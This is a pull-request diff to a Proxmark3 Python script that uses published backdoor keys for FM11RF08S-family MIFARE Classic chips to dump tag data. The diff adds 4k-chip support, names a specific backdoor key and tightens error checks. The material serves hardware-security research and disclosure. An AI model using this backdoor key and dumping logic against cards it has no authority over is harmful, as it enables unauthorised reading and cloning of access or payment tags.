### PR TITLE
mf_backdoor_dump.py: 4k tag support, additional error check

### DIFF
--- a/client/pyscripts/mf_backdoor_dump.py
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python3
 
 # Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
-# Tested on vulnerable 1k chips only
+# Should work on vulnerable 1k and 4k chips
 # Based on the work in this paper: https://eprint.iacr.org/2024/1275
 
 import pm3
@@ -22,13 +22,17 @@ p = pm3.pm3()
 
 # Test all the keys first to see which one works (if any)
 for bk in BACKDOOR_KEYS:
-    p.console(f"hf mf rdbl -c 4 --key {bk} --blk 0")
+    p.console(f"hf mf rdbl -c 4 --blk 0 --key {bk}")
     output = p.grabbed_output.split('\n')
     
     if "auth error" in output[0].lower():
         continue
     elif "can't select card" in output[0].lower():
-        print("Error reading the tag.")
+        print(f"Error reading the tag: {output[0]}")
+        exit()
+    elif len(output) < 2 or "sector 0" not in output[1].lower():
+        print("Unexpected output, exiting:")
+        print("\n".join(output))
         exit()
     else:
         WORKING_KEY = bk
@@ -39,6 +43,9 @@ if not WORKING_KEY:
     exit()
 
 print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
+if WORKING_KEY == "518B3354E760":
+    print(f"Backdoor key is for a 4k chip, will attempt to dump 64 sectors instead of {TOTAL_SECTORS}")
+    TOTAL_SECTORS = 64
 print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
 
 header = False


### PR DESCRIPTION
Add support for dumping backdoor'ed 4k tags as well, thanks to a tip from @doegox 

Also added a more robust error check to catch general unexpected outputs. 